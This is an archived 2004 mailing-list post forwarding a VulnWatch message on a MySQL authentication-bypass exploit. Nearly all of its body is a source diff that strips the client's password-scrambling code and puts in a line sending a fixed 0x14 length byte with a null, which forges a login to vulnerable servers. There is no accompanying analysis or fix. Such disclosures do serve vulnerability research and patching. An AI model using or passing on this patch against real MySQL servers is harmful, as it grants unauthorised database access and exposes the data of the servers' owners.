mysql:9802
From: Toshiboumi bugbird Ohta <Toshiboumi bugbird Ohta <bugbird@xxxxxxxxxx>>
Date: Fri, 9 Jul 2004 10:33:12 +0900
Subject: [mysql 09802] Fw: [VulnWatch] MySQL authentication bypass exploit code.
1941,1956c1941,1942 < if (passwd[0]) < { < if (mysql->server_capabilities & CLIENT_SECURE_CONNECTION) < { < *end++= SCRAMBLE_LENGTH; < scramble(end, mysql->scramble, passwd); < end+= SCRAMBLE_LENGTH; < } < else < { < scramble_323(end, mysql->scramble, passwd); < end+= SCRAMBLE_LENGTH_323 + 1; < } < } < else < *end++= '\0'; /* empty password */ --- > sprintf(end,"\x14\x00"); > end+=2;